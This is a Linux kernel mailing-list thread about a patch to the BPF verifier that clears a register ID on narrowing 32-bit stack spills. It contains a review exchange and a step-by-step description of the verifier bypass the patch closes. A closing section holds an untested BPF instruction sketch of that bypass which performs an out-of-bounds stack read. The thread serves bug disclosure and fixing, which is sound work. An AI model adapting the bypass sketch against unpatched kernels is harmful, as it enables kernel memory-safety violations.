On Tue, 06 Jun 2023 at 18:32:37 -0700, Yonghong Song wrote:
> 
> 
> On 6/6/23 2:42 PM, Maxim Mikityanskiy wrote:
> > From: Maxim Mikityanskiy <maxim@xxxxxxxxxxxxx>
> > 
> > The following scenario describes a verifier bypass in privileged mode
> > (CAP_BPF or CAP_SYS_ADMIN):
> > 
> > 1. Prepare a 32-bit rogue number.
> > 2. Put the rogue number into the upper half of a 64-bit register, and
> >    roll a random (unknown to the verifier) bit in the lower half. The
> >    rest of the bits should be zero (although variations are possible).
> > 3. Assign an ID to the register by MOVing it to another arbitrary
> >    register.
> > 4. Perform a 32-bit spill of the register, then perform a 32-bit fill to
> >    another register. Due to a bug in the verifier, the ID will be
> >    preserved, although the new register will contain only the lower 32
> >    bits, i.e. all zeros except one random bit.
> > 
> > At this point there are two registers with different values but the same
> > ID, which means the integrity of the verifier state has been corrupted.
> > Next steps show the actual bypass:
> > 
> > 5. Compare the new 32-bit register with 0. In the branch where it's
> >    equal to 0, the verifier will believe that the original 64-bit
> >    register is also 0, because it has the same ID, but its actual value
> >    still contains the rogue number in the upper half.
> >    Some optimizations of the verifier prevent the actual bypass, so
> >    extra care is needed: the comparison must be between two registers,
> >    and both branches must be reachable (this is why one random bit is
> >    needed). Both branches are still suitable for the bypass.
> > 6. Right shift the original register by 32 bits to pop the rogue number.
> > 7. Use the rogue number as an offset with any pointer. The verifier will
> >    believe that the offset is 0, while in reality it's the given number.
> > 
> > The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for
> > SCALAR_VALUE. If the spill is narrowing the actual register value, don't
> > keep the ID, make sure it's reset to 0.
> > 
> > Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill")
> > Signed-off-by: Maxim Mikityanskiy <maxim@xxxxxxxxxxxxx>
> 
> LGTM with a small nit below.
> 
> Acked-by: Yonghong Song <yhs@xxxxxx>
> 
> > ---
> >   kernel/bpf/verifier.c | 7 +++++++
> >   1 file changed, 7 insertions(+)
> > 
> > diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> > index 5871aa78d01a..7be23eced561 100644
> > --- a/kernel/bpf/verifier.c
> > +++ b/kernel/bpf/verifier.c
> > @@ -3856,6 +3856,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
> >   	mark_stack_slot_scratched(env, spi);
> >   	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
> >   	    !register_is_null(reg) && env->bpf_capable) {
> > +		bool reg_value_fits;
> > +
> >   		if (dst_reg != BPF_REG_FP) {
> >   			/* The backtracking logic can only recognize explicit
> >   			 * stack slot address like [fp - 8]. Other spill of
> > @@ -3867,7 +3869,12 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
> >   			if (err)
> >   				return err;
> >   		}
> > +
> > +		reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size;
> >   		save_register_state(state, spi, reg, size);
> > +		/* Break the relation on a narrowing spill. */
> > +		if (!reg_value_fits)
> > +			state->stack[spi].spilled_ptr.id = 0;
> 
> I think the code can be simplified like below:
> 
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -4230,6 +4230,8 @@ static int check_stack_write_fixed_off(struct
> bpf_verifier_env *env,
>                         return err;
>                 }
>                 save_register_state(state, spi, reg, size);
> +               if (fls64(reg->umax_value) > BITS_PER_BYTE * size)
> +                       state->stack[spi].spilled_ptr.id = 0;
>         } else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
>                    insn->imm != 0 && env->bpf_capable) {
>                 struct bpf_reg_state fake_reg = {};
> 

That's true, I kept the variable to avoid churn when I send a follow-up
improvement:

+	/* Make sure that reg had an ID to build a relation on spill. */
+	if (reg_value_fits && !reg->id)
+		reg->id = ++env->id_gen;
 	save_register_state(state, spi, reg, size);

But yeah, I agree, let's simplify it for now; there is no guarantee that
the follow-up patch will be accepted as is.

Thanks for the review!

> >   	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
> > 		   insn->imm != 0 && env->bpf_capable) {
> >   		struct bpf_reg_state fake_reg = {};
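
For illustration, here is a rough, untested sketch of what steps 1-7 of the
commit message could look like at the instruction level, written with the
BPF_* insn macros from tools/include/linux/filter.h. It is not the
reproducer or the selftest from this series; the 0xdead value, the register
choices, the stack offsets and the use of bpf_get_prandom_u32() as the
source of the unknown bit are all assumptions made for the example.

/* Illustration only (untested): roughly follows steps 1-7 above.
 * Assumes a privileged loader (CAP_BPF/CAP_SYS_ADMIN).
 */
struct bpf_insn bypass_sketch[] = {
	/* 1.+2. r6 = rogue number in the upper half, one unknown bit below */
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_get_prandom_u32),
	BPF_ALU64_IMM(BPF_AND, BPF_REG_0, 1),
	BPF_LD_IMM64(BPF_REG_6, 0xdeadULL << 32),
	BPF_ALU64_REG(BPF_OR, BPF_REG_6, BPF_REG_0),
	/* 3. 64-bit MOV gives r6 and r7 the same ID */
	BPF_MOV64_REG(BPF_REG_7, BPF_REG_6),
	/* 4. 32-bit spill, then 32-bit fill; the buggy verifier keeps the ID */
	BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_7, -8),
	BPF_LDX_MEM(BPF_W, BPF_REG_8, BPF_REG_10, -8),
	/* 5. compare against another register known to be zero; both
	 * branches are reachable thanks to the unknown bit
	 */
	BPF_MOV64_IMM(BPF_REG_9, 0),
	BPF_JMP_REG(BPF_JNE, BPF_REG_8, BPF_REG_9, 4),
	/* 6.+7. in the "equal" branch the verifier believes r6 == 0: pop the
	 * rogue number and use it as an offset from the stack pointer
	 */
	BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 32),
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
	BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_6),
	BPF_LDX_MEM(BPF_W, BPF_REG_0, BPF_REG_2, -8),	/* OOB read at runtime */
	BPF_MOV64_IMM(BPF_REG_0, 0),
	BPF_EXIT_INSN(),
};

The verifier sees the ADD as "stack pointer plus a scalar known to be 0",
while at runtime r2 points 0xdead bytes past the frame, which is exactly
the offset/value confusion the fix closes by clearing the spilled ID on a
narrowing spill.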